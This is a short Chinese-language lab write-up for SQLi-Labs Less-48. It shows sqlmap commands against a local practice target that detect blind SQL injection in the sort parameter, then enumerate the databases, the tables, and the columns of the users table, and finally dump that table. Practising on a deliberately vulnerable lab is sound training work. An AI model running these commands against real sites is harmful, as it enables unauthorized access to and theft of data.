SQLI-LAPS 实验记录
Less-48
这一关是盲注,页面上没有任何反馈信息,所以我们采用sqlmap工具来帮助进行自动化注入。
首先我们在命令行中输入sqlmap命令:
sql
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch结果如图所示,有两种注入方式可选,布尔盲注和时间盲注,接下来我们继续采用sqlmap自动化注入。
sql
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch --dbs
结果如图所示,页面返回数据库的名称,注入有效。
之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。
- 爆出表名:
php
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security --tables- 爆出列名:
php
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --columns- 爆出内容:
php
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --dump